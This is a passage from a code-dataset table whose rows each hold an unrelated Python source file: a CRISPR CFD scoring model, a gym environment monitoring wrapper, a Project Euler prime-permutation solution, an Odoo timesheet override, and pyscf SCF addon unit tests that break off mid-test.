| max_stars_repo_path (string, 3-269 chars) | max_stars_repo_name (string, 4-119 chars) | max_stars_count (int64, 0-191k) | id (string, 1-7 chars) | content (string, 6-1.05M chars) | score (float64, 0.23-5.13) | int_score (int64, 0-5) |
|---|---|---|---|---|---|---|
amocrm_api_client/token_provider/impl/standard/__init__.py
|
iqtek/amocrm_api_client
| 0
|
12783851
|
<filename>amocrm_api_client/token_provider/impl/standard/__init__.py
from .StandardTokenProviderFactory import StandardTokenProviderFactory
| 1.203125
| 1
|
elevation/models.py
|
michael-weinstein/Elevation
| 96
|
12783852
|
import numpy as np
import elevation.model_comparison
import os
import pandas
import multiprocessing
cur_dir = os.path.dirname(os.path.abspath(__file__))
class CFDModel(object):
def __init__(self, cfd_table=None, cfd_table_file=None):
if cfd_table is None:
#print "Loading CFD table from file"
self.cfd_table = elevation.model_comparison.get_NBT_cfd(cfd_table_file)
else:
self.cfd_table = cfd_table
self.cfd_table.index = self.cfd_table['Mismatch Type']
def fit(self):
pass
def predict(self, annots_list, num_proc=20):
# One prediction per annotation list; an empty input yields an empty array.
if len(annots_list) == 0:
return np.ones(0)
preds = np.ones(len(annots_list))
if num_proc > 1:
pool = multiprocessing.Pool(processes=num_proc)
jobs = []
for i, annots in enumerate(annots_list):
jobs.append(pool.apply_async(predict_annot, (annots, self.cfd_table)))
pool.close()
pool.join()
for i, j in enumerate(jobs):
pred = j.get()
preds[i] = pred
pool.terminate()
else:
for i, annots in enumerate(annots_list):
preds[i] = predict_annot(annots, self.cfd_table)
return preds
def predict_annot(annots, cfd_table):
pred_i = 1.0
for a in annots:
letters, pos = elevation.model_comparison.parse_mismatch_annot(a)
if pos=='':
annot_new = letters # a PAM mutation
else:
letters = str(letters)
annot_new = letters[0] + ":" + letters[1] + "," + str(pos)
if a == 'GG':
tmp_pred = 1.0
else:
tmp_pred = cfd_table["Percent-Active"].loc[annot_new]
# preds[i] = tmp_pred*preds[i]
pred_i = pred_i * tmp_pred
return pred_i
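# --- Hedged usage sketch (not part of the original module) ---
# A CFD score is the product of per-mismatch "Percent-Active" fractions looked
# up in the CFD table, which is what predict_annot computes above. The tiny
# table and annotation strings below are made-up placeholders for illustration.
if __name__ == "__main__":
    toy_table = pandas.DataFrame(
        {"Mismatch Type": ["G:T,3", "A:C,7"], "Percent-Active": [0.8, 0.5]}
    )
    toy_table.index = toy_table["Mismatch Type"]
    score = 1.0
    for annot in ["G:T,3", "A:C,7"]:
        score *= toy_table["Percent-Active"].loc[annot]
    print(score)  # 0.4 == 0.8 * 0.5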
| 2.28125
| 2
|
environments/SmartMonitor.py
|
KMarino/hrl-ep3
| 17
|
12783853
|
import os
import collections
import pdb
import gym
import gym.envs.mujoco
import time
import csv
import json
import shutil
import numpy as np
import random
from . import ant_env
from . import proprioceptive_humanoid_env
from . import maze_ant
from . import maze_humanoid
# Wrapper that records everything we might care about in our environment
# All rewards (clipped and raw), states, actions, time and steps
# Copied originally from https://github.com/openai/baselines/blob/master/baselines/bench/monitor.py
class SmartMonitor(gym.Wrapper):
def __init__(self, env, log_dir, rank, opt, verbose=True, allow_early_resets=False):
super(SmartMonitor, self).__init__(env)
self.tstart = time.time()
self.episode_count = -1
# Get the rewards we want to log
# Got to be a better way to get the names of the subpart rewards, but it seems to be hardcoded in the mujoco envs
self.reward_list = ['reward_env']
if opt['model']['mode'] in ['baseline', 'baseline_reverse', 'baselinewtheta', 'baseline_lowlevel']:
self.baseline = True
elif opt['model']['mode'] in ['phasesimple', 'phasewstate', 'phasewtheta', 'phase_lowlevel']:
self.baseline = False
self.reward_list.append('reward_exp')
if opt['model']['mode'] != 'phase_lowlevel':
self.reward_list.append('reward_move')
if opt['env']['state_cycle_weight'] > 0 or opt['env']['action_cycle_weight'] > 0:
self.reward_list.append('reward_cycle')
self.reward_list.append('reward_cycle_s')
self.reward_list.append('reward_cycle_a')
elif opt['model']['mode'] == 'interpolate':
self.baseline = False
self.reward_list.append('reward_interpolate')
elif opt['model']['mode'] == 'cyclic':
self.baseline = False
self.reward_list.append('reward_cycle')
self.reward_list.append('reward_thresh')
elif opt['model']['mode'] in ['hierarchical', 'hierarchical_many']:
self.baseline = True
self.reward_list.append('reward_velocity')
self.reward_list.append('reward_goal')
elif opt['model']['mode'] in [ 'maze_baseline', 'maze_baseline_wphase']:
self.baseline = True
self.reward_list.append('reward_velocity')
self.reward_list.append('reward_goal')
else:
raise NotImplementedError
# This is currently hardcoded to Mujoco envs
if isinstance(env.unwrapped, ant_env.BaseAntEnv) or isinstance(env.unwrapped, ant_env.BaseAntLowGearEnv) or isinstance(env.unwrapped, proprioceptive_humanoid_env.BaseProprioceptiveHumanoidEnv):
self.reward_list += ['reward_forward', 'reward_ctrl', 'reward_contact', 'reward_survive']
elif isinstance(env.unwrapped, gym.envs.mujoco.AntEnv):
self.reward_list += ['reward_forward', 'reward_ctrl', 'reward_contact', 'reward_survive']
else:
raise NotImplementedError
# Data structure that holds all the values we want to log
self.episode_struct = collections.OrderedDict()
all_keys = self.reward_list + ['obs', 'action', 'env_count', 'episode_count']
if isinstance(env.unwrapped, ant_env.BaseAntEnv) or isinstance(env.unwrapped, ant_env.BaseAntLowGearEnv) or isinstance(env.unwrapped, proprioceptive_humanoid_env.BaseProprioceptiveHumanoidEnv) or isinstance(env.unwrapped, gym.envs.mujoco.MujocoEnv):
all_keys += ['state']
# Log the distances
if opt['model']['mode'] in ['hierarchical', 'hierarchical_many', 'maze_baseline', 'maze_baseline_wphase']:
if isinstance(env.unwrapped, maze_humanoid.ProprioceptiveHumanoidMazeEnv) or isinstance(env.unwrapped, maze_ant.AntMazeEnv):
all_keys += ['goal_distance', 'goal_distance_radius']
for key in all_keys:
self.episode_struct[key] = []
# Create and initialize our csv files
# File to store entire episode information (rather than every single step)
# Prints total reward (for all rewards), overall obs and state displacements, episode length, and episode time
episode_filename = os.path.join(log_dir, str(rank) + '.Episode.Monitor.csv')
self.ep_f = open(episode_filename, "wt")
self.ep_f.write('# Episode Logging %s\n'%json.dumps({"t_start": self.tstart, 'env_id' : env.spec and env.spec.id, 'mode': opt['model']['mode'], 'name': opt['logs']['exp_name']}))
ep_fields = self.reward_list + ['delta_obs', 'mean_action', 'episode_len', 'episode_dt', 'episode_count']
if isinstance(env.unwrapped, ant_env.BaseAntEnv) or isinstance(env.unwrapped, ant_env.BaseAntLowGearEnv) or isinstance(env.unwrapped, proprioceptive_humanoid_env.BaseProprioceptiveHumanoidEnv) or isinstance(env.unwrapped, gym.envs.mujoco.MujocoEnv):
ep_fields += ['delta_state']
if opt['model']['mode'] in ['hierarchical', 'hierarchical_many', 'maze_baseline', 'maze_baseline_wphase']:
if isinstance(env.unwrapped, maze_humanoid.ProprioceptiveHumanoidMazeEnv) or isinstance(env.unwrapped, maze_ant.AntMazeEnv):
ep_fields += ['goal_distance', 'goal_distance_radius']
self.ep_logger = csv.DictWriter(self.ep_f, fieldnames=ep_fields)
self.ep_logger.writeheader()
self.ep_f.flush()
# If in super verbose mode
if verbose:
# File to store every step
# Prints everything in episode_struct plus episode count
step_filename = os.path.join(log_dir, str(rank) + '.Step.Monitor.csv')
self.st_f = open(step_filename, "wt")
self.st_f.write('# Episode Logging %s\n'%json.dumps({"t_start": self.tstart, 'env_id' : env.spec and env.spec.id, 'mode': opt['model']['mode'], 'name': opt['logs']['exp_name']}))
st_fields = list(self.episode_struct.keys())
self.st_logger = csv.DictWriter(self.st_f, fieldnames=st_fields)
self.st_logger.writeheader()
self.st_f.flush()
else:
self.st_f = None
self.verbose = verbose
self.rank = rank
self.opt = opt
self.log_dir = log_dir
# Other bookkeeping
self.allow_early_resets = allow_early_resets
self.needs_reset = True
self.total_steps = 0
self.current_reset_info = {} # extra info about the current episode, that was passed in during reset()
# Reset environment, record initial values
def reset(self, **kwargs):
if not self.allow_early_resets and not self.needs_reset:
raise RuntimeError("Tried to reset an environment before done. If you want to allow early resets, wrap your env with Monitor(env, path, allow_early_resets=True)")
# Reset all the values in self.episode_struct
for key in self.episode_struct:
self.episode_struct[key] = []
# Update episode count
self.episode_count += 1
# Update values and return
obs = self.env.reset(**kwargs)
self.record_info(obs, 0)
self.needs_reset = False
return obs
# Take a step, update all the values
def step(self, action):
if self.needs_reset:
raise RuntimeError("Tried to step environment that needs reset")
# Do step
obs, rew, done, info = self.env.step(action)
# Record new info
self.record_info(obs, rew, action, info)
# If done with episode, get summary info for episode and dump values to episode and step files
if done:
self.needs_reset = True
# For rewards, get sums
epinfo = {}
for key in self.reward_list:
reward_val = sum(self.episode_struct[key])
epinfo[key] = reward_val
# For obs and state, get delta change
epinfo['delta_obs'] = self.episode_struct['obs'][-1] - self.episode_struct['obs'][0]
if 'state' in self.episode_struct:
epinfo['delta_state'] = self.episode_struct['state'][-1] - self.episode_struct['state'][0]
# For action, get average value
epinfo['mean_action'] = np.mean(self.episode_struct['action'], axis=0)
# Update episode_len, episode_dt and episode_count
epinfo['episode_len'] = len(self.episode_struct['env_count'])
epinfo['episode_dt'] = round(time.time() - self.tstart, 6)
epinfo['episode_count'] = self.episode_count
# Update goal distances
if 'goal_distance' in self.episode_struct:
epinfo['goal_distance'] = self.episode_struct['goal_distance'][-1]
epinfo['goal_distance_radius'] = self.episode_struct['goal_distance_radius'][-1]
elif 'key_distance' in self.episode_struct:
epinfo['key_distance'] = self.episode_struct['key_distance'][-1]
epinfo['key_distance_radius'] = self.episode_struct['key_distance_radius'][-1]
epinfo['lock_distance'] = self.episode_struct['lock_distance'][-1]
epinfo['lock_distance_radius'] = self.episode_struct['lock_distance_radius'][-1]
# Do string conversion
for k in epinfo:
epinfo[k] = str(epinfo[k]).replace('\n', '')
# Update episode file
if self.ep_logger:
self.ep_logger.writerow(epinfo)
self.ep_f.flush()
# If in super verbose mode
if self.verbose:
# Make and update a temp step file with just the last episode (and only rank 0, and only every 100)
if self.rank == 0: #and self.episode_count % 100 == 0:
# Setup temp file
tmp_step_filename = os.path.join(self.log_dir, 'Tmp.Last.Step.Monitor.csv')
tmp_f = open(tmp_step_filename, "wt")
tmp_f.write('# Episode Logging %s\n'%json.dumps({"t_start": self.tstart, 'env_id' : self.env.spec and self.env.spec.id, 'mode': self.opt['model']['mode'], 'name': self.opt['logs']['exp_name']}))
st_fields = list(self.episode_struct.keys())
tmp_logger = csv.DictWriter(tmp_f, fieldnames=st_fields)
tmp_logger.writeheader()
tmp_f.flush()
else:
tmp_f = None
# Update step file
assert(self.episode_struct['env_count'][-1]+1 == len(self.episode_struct['env_count']))
for step in range(len(self.episode_struct['env_count'])):
stepinfo = {}
for key in self.episode_struct:
stepinfo[key] = self.episode_struct[key][step]
# Do string conversion
for k in stepinfo:
stepinfo[k] = str(stepinfo[k]).replace('\n', '')
# Update loggers
self.st_logger.writerow(stepinfo)
if tmp_f is not None:
tmp_logger.writerow(stepinfo)
self.st_f.flush()
# Write tmp file and close, copy tmp to last
if tmp_f is not None:
tmp_f.flush()
tmp_f.close()
# Copy tmp to last
last_step_filename = os.path.join(self.log_dir, 'Last.Step.Monitor.csv')
shutil.copyfile(tmp_step_filename, last_step_filename)
# Update info
info['episode'] = epinfo
self.total_steps += 1
return (obs, rew, done, info)
# Record step info
def record_info(self, obs, rew, action=None, info=None):
# Update all of our values
# Reward values
for key in self.reward_list:
# If reset, all 0
if info is None:
self.episode_struct[key].append(0)
else:
# For baseline, reward_env is reward
if key == 'reward_env' and self.baseline:
self.episode_struct[key].append(rew)
else:
self.episode_struct[key].append(info[key])
# Observation values
self.episode_struct['obs'].append(obs)
# State values, right now just Mujoco
if isinstance(self.env.unwrapped, ant_env.BaseAntEnv) or isinstance(self.env.unwrapped, ant_env.BaseAntLowGearEnv) or isinstance(self.env.unwrapped, proprioceptive_humanoid_env.BaseProprioceptiveHumanoidEnv) or isinstance(self.env.unwrapped, gym.envs.mujoco.MujocoEnv):
state = self.env.unwrapped.state_vector()
self.episode_struct['state'].append(state)
# Update actions
if action is None:
action = np.zeros(self.env.action_space.shape)
self.episode_struct['action'].append(action)
# Update step and episode counts
env_count = self.env._elapsed_steps
self.episode_struct['env_count'].append(env_count)
self.episode_struct['episode_count'].append(self.episode_count)
# Update distances
if 'goal_distance' in self.episode_struct:
if info is None:
self.episode_struct['goal_distance'].append(0)
self.episode_struct['goal_distance_radius'].append(0)
else:
self.episode_struct['goal_distance'].append(info['goal_distance'])
self.episode_struct['goal_distance_radius'].append(info['goal_distance_radius'])
# Close file handles
def close(self):
if self.ep_f is not None:
self.ep_f.close()
if self.st_f is not None:
self.st_f.close()
# Get total number of steps
def get_total_steps(self):
return self.total_steps
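# --- Hedged configuration sketch (not part of the original module) ---
# SmartMonitor only reads a handful of keys from `opt`; a dictionary shaped
# like the one below satisfies the lookups above. The concrete values are
# illustrative assumptions.
EXAMPLE_OPT = {
    "model": {"mode": "baseline"},
    "env": {"state_cycle_weight": 0, "action_cycle_weight": 0},
    "logs": {"exp_name": "debug_run"},
}
# Typical wrapping (assuming a compatible Mujoco-based env from this repo):
#     env = SmartMonitor(env, log_dir="/tmp/logs", rank=0, opt=EXAMPLE_OPT)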
| 2
| 2
|
euler49.py
|
dchourasia/euler-solutions
| 0
|
12783854
|
<filename>euler49.py
'''
The arithmetic sequence, 1487, 4817, 8147, in which each of the terms increases by 3330, is unusual in two ways: (i) each of the three terms are prime, and, (ii) each of the 4-digit numbers are permutations of one another.
There are no arithmetic sequences made up of three 1-, 2-, or 3-digit primes, exhibiting this property, but there is one other 4-digit increasing sequence.
What 12-digit number do you form by concatenating the three terms in this sequence?
'''
import math
primes=[]
def get_primes(mx):
x=1
while x < mx:
x+=1
y=int(math.sqrt(x))
isprime=True
for z in primes:
if z > y:
break
if x%z==0:
isprime=False
break
if isprime:
primes.append(x)
get_primes(10000)
print(primes[-1])
primes = [x for x in primes if x > 999]
print(len(primes))
for i, x in enumerate(primes):
for y in primes[i+1:]:
# compare sorted digit strings so repeated digits are handled correctly
if y + y - x in primes and sorted(str(x)) == sorted(str(y)) == sorted(str(y + y - x)):
print(x, y, y + y - x)
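# Hedged check (illustration only): the known sequence from the problem
# statement, 1487 -> 4817 -> 8147, consists of digit permutations, which the
# sorted-digit comparison above detects.
assert sorted(str(1487)) == sorted(str(4817)) == sorted(str(8147))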
| 3.640625
| 4
|
addons14/sale_timesheet_rounded/models/sale.py
|
odoochain/addons_oca
| 1
|
12783855
|
<filename>addons14/sale_timesheet_rounded/models/sale.py
# Copyright 2019 Camptocamp SA
# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl)
from odoo import api, models
class SaleOrderLine(models.Model):
_inherit = "sale.order.line"
def _get_delivered_quantity_by_analytic(self, additional_domain):
# If we land here, it is only because we are dealing with SO lines
# having `qty_delivered_method` equal to `analytic` or `timesheet`.
# The first case matches expense lines, the latter timesheet lines.
# Expenses are already discarded in our a.a.l. overrides
# so it's fine to set the ctx key here anyway.
return super(
SaleOrderLine, self.with_context(timesheet_rounding=True)
)._get_delivered_quantity_by_analytic(additional_domain)
@api.depends("analytic_line_ids.unit_amount_rounded")
def _compute_qty_delivered(self):
"""Adds the dependency on unit_amount_rounded."""
super()._compute_qty_delivered()
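# --- Hedged sketch (not from this module) ---
# The context key set above is meant to be read on the analytic-line side to
# switch between the rounded and the raw timesheet quantity. The helper below
# is an illustrative assumption; only `unit_amount_rounded` is named by the
# @api.depends above.
def _illustrative_rounded_quantity(analytic_line):
    if analytic_line.env.context.get("timesheet_rounding"):
        return analytic_line.unit_amount_rounded
    return analytic_line.unit_amount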
| 1.71875
| 2
|
pyscf/scf/test/test_addons.py
|
robert-anderson/pyscf
| 7
|
12783856
|
<filename>pyscf/scf/test/test_addons.py
#!/usr/bin/env python
# Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import copy
import numpy
import scipy.linalg
from pyscf import gto, lib
from pyscf import scf, dft
from pyscf.scf import addons
mol = gto.Mole()
mol.verbose = 7
mol.output = '/dev/null'
mol.atom = [
["O" , (0. , 0. , 0.)],
[1 , (0. , -0.757 , 0.587)],
[1 , (0. , 0.757 , 0.587)] ]
mol.basis = {"H": '6-31g',
"O": '6-31g',}
mol.build()
mf = scf.RHF(mol).run()
mol_dz = mol.copy()
mol_dz.basis = 'cc-pvdz'
mol_dz.cart = True
mol_dz.build(False, False)
mol1 = mol.copy()
mol1.spin = 2
mf_u = scf.UHF(mol1).run()
mol2 = mol.copy()
mol2.symmetry = True
mol2.build(0,0)
sym_mf = scf.RHF(mol2).run()
mol3 = mol1.copy()
mol3.symmetry = True
mol3.spin = 2
mol3.build(0,0)
sym_mf_u = scf.UHF(mol3).run()
def tearDownModule():
global mol, mf, mol_dz, mol1, mf_u, mol2, sym_mf, mol3, sym_mf_u
mol.stdout.close()
del mol, mf, mol_dz, mol1, mf_u, mol2, sym_mf, mol3, sym_mf_u
class KnownValues(unittest.TestCase):
def test_project_mo_nr2nr(self):
nao = mol.nao_nr()
c = numpy.random.random((nao,nao))
c1 = addons.project_mo_nr2nr(mol, c, mol)
self.assertAlmostEqual(abs(c-c1).max(), 0, 12)
numpy.random.seed(15)
nao = mol.nao_nr()
mo1 = numpy.random.random((nao,nao))
mo2 = addons.project_mo_nr2nr(mol, [mo1,mo1], mol_dz)
self.assertAlmostEqual(abs(mo2[0]).sum(), 83.436359425591888, 11)
self.assertAlmostEqual(abs(mo2[1]).sum(), 83.436359425591888, 11)
def test_project_mo_r2r(self):
nao = mol.nao_2c()
c = numpy.random.random((nao*2,nao*2))
c = c + numpy.sin(c)*1j
c1 = addons.project_mo_r2r(mol, c, mol)
self.assertAlmostEqual(abs(c-c1).max(), 0, 12)
numpy.random.seed(15)
n2c = mol.nao_2c()
n4c = n2c * 2
mo1 = numpy.random.random((n4c,n4c)) + numpy.random.random((n4c,n4c))*1j
mo2 = addons.project_mo_r2r(mol, [mo1,mo1], mol_dz)
self.assertAlmostEqual(abs(mo2[0]).sum(), 2159.3715489514038, 11)
self.assertAlmostEqual(abs(mo2[1]).sum(), 2159.3715489514038, 11)
def test_project_mo_nr2r(self):
numpy.random.seed(15)
nao = mol.nao_nr()
mo1 = numpy.random.random((nao,nao))
mo2 = addons.project_mo_nr2r(mol, [mo1,mo1], mol_dz)
self.assertAlmostEqual(abs(mo2[0]).sum(), 172.66468850263556, 11)
self.assertAlmostEqual(abs(mo2[1]).sum(), 172.66468850263556, 11)
mo2 = addons.project_mo_nr2r(mol, mo1, mol_dz)
self.assertAlmostEqual(abs(mo2).sum(), 172.66468850263556, 11)
def test_project_dm_nr2nr(self):
nao = mol.nao_nr()
dm = numpy.random.random((nao,nao))
dm = dm + dm.T
x1 = addons.project_dm_nr2nr(mol, dm, mol)
self.assertAlmostEqual(abs(dm-x1).max(), 0, 12)
numpy.random.seed(15)
mo = numpy.random.random((nao,10))
mo1 = addons.project_mo_nr2nr(mol, mo, mol_dz)
dm = numpy.dot(mo, mo.T)
dmref = numpy.dot(mo1, mo1.T)
dm1 = addons.project_dm_nr2nr(mol, [dm,dm], mol_dz)
self.assertAlmostEqual(abs(dmref-dm1[0]).max(), 0, 11)
self.assertAlmostEqual(abs(dmref-dm1[1]).max(), 0, 11)
self.assertAlmostEqual(lib.finger(dm1[0]), 73.603267455214876, 11)
def test_project_dm_r2r(self):
nao = mol.nao_2c()
dm = numpy.random.random((nao*2,nao*2))
dm = dm + numpy.sin(dm)*1j
x1 = addons.project_dm_r2r(mol, dm, mol)
self.assertTrue(numpy.allclose(dm, x1))
numpy.random.seed(15)
n2c = mol.nao_2c()
n4c = n2c * 2
mo = numpy.random.random((n4c,10)) + numpy.random.random((n4c,10))*1j
mo1 = addons.project_mo_r2r(mol, mo, mol_dz)
dm = numpy.dot(mo, mo.T.conj())
dmref = numpy.dot(mo1, mo1.T.conj())
dm1 = addons.project_dm_r2r(mol, [dm,dm], mol_dz)
self.assertAlmostEqual(abs(dmref-dm1[0]).max(), 0, 11)
self.assertAlmostEqual(abs(dmref-dm1[1]).max(), 0, 11)
self.assertAlmostEqual(lib.finger(dm1[0]), -5.3701392643370607+15.484616570244016j, 11)
def test_project_dm_nr2r(self):
numpy.random.seed(15)
nao = mol.nao_nr()
mo = numpy.random.random((nao,10))
mo1 = addons.project_mo_nr2r(mol, mo, mol_dz)
dm = numpy.dot(mo, mo.T.conj())
dmref = numpy.dot(mo1, mo1.T.conj())
dm1 = addons.project_dm_nr2r(mol, [dm,dm], mol_dz)
self.assertAlmostEqual(abs(dmref-dm1[0]).max(), 0, 11)
self.assertAlmostEqual(abs(dmref-dm1[1]).max(), 0, 11)
self.assertAlmostEqual(lib.finger(dm1[0]), -13.580612999088892-20.209297457056557j, 11)
dm1 = addons.project_dm_nr2r(mol, dm, mol_dz)
self.assertAlmostEqual(abs(dmref-dm1).max(), 0, 11)
def test_frac_occ(self):
mol = gto.Mole()
mol.verbose = 5
mol.output = '/dev/null'
mol.atom = '''
7 0. 0 -0.7
7 0. 0 0.7'''
mol.basis = 'cc-pvdz'
mol.charge = 2
mol.build()
mf = scf.RHF(mol)
mf = addons.frac_occ(mf)
self.assertAlmostEqual(mf.scf(), -107.13465364012296, 9)
mol.charge = -1
mol.spin = 1
mf = scf.RHF(mol)
mf = addons.frac_occ(mf)
self.assertAlmostEqual(mf.scf(), -108.3626325837689, 9)
mol.charge = 1
mol.spin = 1
mf = scf.rhf.RHF(mol)
mf = addons.frac_occ(mf)
self.assertAlmostEqual(mf.scf(), -108.10375514714799, 9)
mol.charge = 1
mol.spin = 1
mf = scf.UHF(mol)
mf = addons.frac_occ(mf)
self.assertAlmostEqual(mf.scf(), -108.17458104180083, 9)
mol.charge = 0
mol.spin = 0
mf = scf.RHF(mol)
mf = addons.frac_occ(mf)
self.assertAlmostEqual(mf.scf(), -108.76171800006837, 9)
self.assertTrue(numpy.allclose(mf.mo_occ[:7], [2,2,2,2,2,2,2]))
mol.stdout.close()
def test_dynamic_occ(self):
mol = gto.Mole()
mol.verbose = 5
mol.output = '/dev/null'
mol.atom = '''
6 0. 0 -0.7
6 0. 0 0.7'''
mol.basis = 'cc-pvdz'
mol.charge = 2
mol.build()
mf = scf.RHF(mol)
mf = addons.dynamic_occ(mf)
self.assertAlmostEqual(mf.scf(), -74.214503776693817, 9)
mol.stdout.close()
def test_follow_state(self):
mf1 = addons.follow_state(mf).run()
self.assertAlmostEqual(mf1.e_tot, mf.e_tot, 9)
mo0 = mf.mo_coeff[:,[0,1,2,3,5]]
mf1 = addons.follow_state(mf, mo0)
self.assertAlmostEqual(mf1.scf(), -75.178145727548511, 9)
self.assertTrue(numpy.allclose(mf1.mo_occ[:6], [2,2,2,2,0,2]))
def test_float_occ(self):
mol = gto.Mole()
mol.verbose = 5
mol.output = '/dev/null'
mol.atom = '''
C 0. 0 0'''
mol.basis = 'cc-pvdz'
mol.build()
mf = scf.UHF(mol)
mf = addons.float_occ(mf)
self.assertAlmostEqual(mf.scf(), -37.590712883365917, 9)
mol.stdout.close()
def test_mom_occ(self):
mf = dft.UKS(mol)
mf.xc = 'b3lyp'
mf.scf()
mo0 = mf.mo_coeff
occ = mf.mo_occ
occ[0][4] = 0.
occ[0][5] = 1.
mf = addons.mom_occ(mf, mo0, occ)
dm = mf.make_rdm1(mo0, occ)
self.assertAlmostEqual(mf.scf(dm), -76.0606858747, 9)
self.assertTrue(numpy.allclose(mf.mo_occ[0][:6], [1,1,1,1,0,1]))
mf = scf.ROHF(mol).run()
mo0 = mf.mo_coeff
occ = mf.mo_occ
setocc = numpy.zeros((2, occ.size))
setocc[:, occ==2] = 1
setocc[0][4] = 0
setocc[0][5] = 1
newocc = setocc[0][:] + setocc[1][:]
mf = addons.mom_occ(mf, mo0, setocc)
dm = mf.make_rdm1(mo0, newocc)
mf.kernel(dm)
self.assertAlmostEqual(mf.e_tot, -75.723654936331542, 9)
self.assertTrue(numpy.allclose(mf.mo_occ[:6], [2,2,2,2,1,1]))
def test_dynamic_level_shift(self):
mf = scf.RHF(mol)
mf = addons.dynamic_level_shift(mf)
mf.init_guess = 'hcore'
mf.max_cycle = 4
mf.kernel()
self.assertAlmostEqual(mf.e_tot, -75.868344714445342, 9)
def test_convert_to_scf(self):
from pyscf.x2c import x2c
from pyscf.df import df_jk
from pyscf.soscf import newton_ah
addons.convert_to_rhf(dft.RKS(mol))
addons.convert_to_uhf(dft.RKS(mol))
#addons.convert_to_ghf(dft.RKS(mol))
addons.convert_to_rhf(dft.UKS(mol))
addons.convert_to_uhf(dft.UKS(mol))
#addons.convert_to_ghf(dft.UKS(mol))
#addons.convert_to_rhf(dft.GKS(mol))
#addons.convert_to_uhf(dft.GKS(mol))
#addons.convert_to_ghf(dft.GKS(mol))
self.assertTrue(isinstance(addons.convert_to_rhf(mf), scf.rhf.RHF))
self.assertTrue(isinstance(addons.convert_to_uhf(mf), scf.uhf.UHF))
self.assertTrue(isinstance(addons.convert_to_ghf(mf), scf.ghf.GHF))
self.assertTrue(isinstance(addons.convert_to_rhf(scf.UHF(mol)), scf.rhf.RHF))
self.assertTrue(isinstance(addons.convert_to_rhf(mf_u), scf.rohf.ROHF))
self.assertTrue(isinstance(addons.convert_to_uhf(mf_u), scf.uhf.UHF))
self.assertTrue(isinstance(addons.convert_to_ghf(mf_u), scf.ghf.GHF))
self.assertTrue(isinstance(addons.convert_to_rhf(sym_mf), scf.hf_symm.RHF))
self.assertTrue(isinstance(addons.convert_to_uhf(sym_mf), scf.uhf_symm.UHF))
self.assertTrue(isinstance(addons.convert_to_ghf(sym_mf), scf.ghf_symm.GHF))
self.assertTrue(isinstance(addons.convert_to_rhf(sym_mf_u), scf.hf_symm.ROHF))
self.assertTrue(isinstance(addons.convert_to_uhf(sym_mf_u), scf.uhf_symm.UHF))
self.assertTrue(isinstance(addons.convert_to_ghf(sym_mf_u), scf.ghf_symm.GHF))
mf1 = copy.copy(mf)
self.assertTrue(isinstance(mf1.convert_from_(mf), scf.rhf.RHF))
self.assertTrue(isinstance(mf1.convert_from_(mf_u), scf.rhf.RHF))
self.assertFalse(isinstance(mf1.convert_from_(mf_u), scf.rohf.ROHF))
self.assertTrue(isinstance(mf1.convert_from_(sym_mf), scf.rhf.RHF))
self.assertTrue(isinstance(mf1.convert_from_(sym_mf_u), scf.rhf.RHF))
self.assertFalse(isinstance(mf1.convert_from_(sym_mf_u), scf.rohf.ROHF))
self.assertFalse(isinstance(mf1.convert_from_(sym_mf), scf.hf_symm.RHF))
self.assertFalse(isinstance(mf1.convert_from_(sym_mf_u), scf.hf_symm.RHF))
mf1 = copy.copy(mf_u)
self.assertTrue(isinstance(mf1.convert_from_(mf), scf.uhf.UHF))
self.assertTrue(isinstance(mf1.convert_from_(mf_u), scf.uhf.UHF))
self.assertTrue(isinstance(mf1.convert_from_(sym_mf), scf.uhf.UHF))
self.assertTrue(isinstance(mf1.convert_from_(sym_mf_u), scf.uhf.UHF))
self.assertFalse(isinstance(mf1.convert_from_(sym_mf), scf.uhf_symm.UHF))
self.assertFalse(isinstance(mf1.convert_from_(sym_mf_u), scf.uhf_symm.UHF))
mf1 = scf.GHF(mol)
self.assertTrue(isinstance(mf1.convert_from_(mf), scf.ghf.GHF))
self.assertTrue(isinstance(mf1.convert_from_(mf_u), scf.ghf.GHF))
self.assertTrue(isinstance(mf1.convert_from_(sym_mf), scf.ghf.GHF))
self.assertTrue(isinstance(mf1.convert_from_(sym_mf_u), scf.ghf.GHF))
self.assertFalse(isinstance(mf1.convert_from_(sym_mf), scf.ghf_symm.GHF))
self.assertFalse(isinstance(mf1.convert_from_(sym_mf_u), scf.ghf_symm.GHF))
self.assertTrue(isinstance(addons.convert_to_rhf(scf.RHF(mol).density_fit(), remove_df=False), df_jk._DFHF))
self.assertTrue(isinstance(addons.convert_to_uhf(scf.RHF(mol).density_fit(), remove_df=False), df_jk._DFHF))
self.assertTrue(isinstance(addons.convert_to_ghf(scf.RHF(mol).density_fit(), remove_df=False), df_jk._DFHF))
self.assertTrue(isinstance(addons.convert_to_rhf(scf.UHF(mol).density_fit(), remove_df=False), df_jk._DFHF))
self.assertTrue(isinstance(addons.convert_to_uhf(scf.UHF(mol).density_fit(), remove_df=False), df_jk._DFHF))
self.assertTrue(isinstance(addons.convert_to_ghf(scf.UHF(mol).density_fit(), remove_df=False), df_jk._DFHF))
#self.assertTrue(isinstance(addons.convert_to_rhf(scf.GHF(mol).density_fit(), remove_df=False),df_jk. _DFHF))
#self.assertTrue(isinstance(addons.convert_to_uhf(scf.GHF(mol).density_fit(), remove_df=False),df_jk. _DFHF))
self.assertTrue(isinstance(addons.convert_to_ghf(scf.GHF(mol).density_fit(), remove_df=False), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_rhf(scf.RHF(mol).density_fit(), out=scf.RHF(mol), remove_df=False), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_uhf(scf.RHF(mol).density_fit(), out=scf.UHF(mol), remove_df=False), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_ghf(scf.RHF(mol).density_fit(), out=scf.GHF(mol), remove_df=False), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_rhf(scf.UHF(mol).density_fit(), out=scf.RHF(mol), remove_df=False), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_uhf(scf.UHF(mol).density_fit(), out=scf.UHF(mol), remove_df=False), df_jk._DFHF))
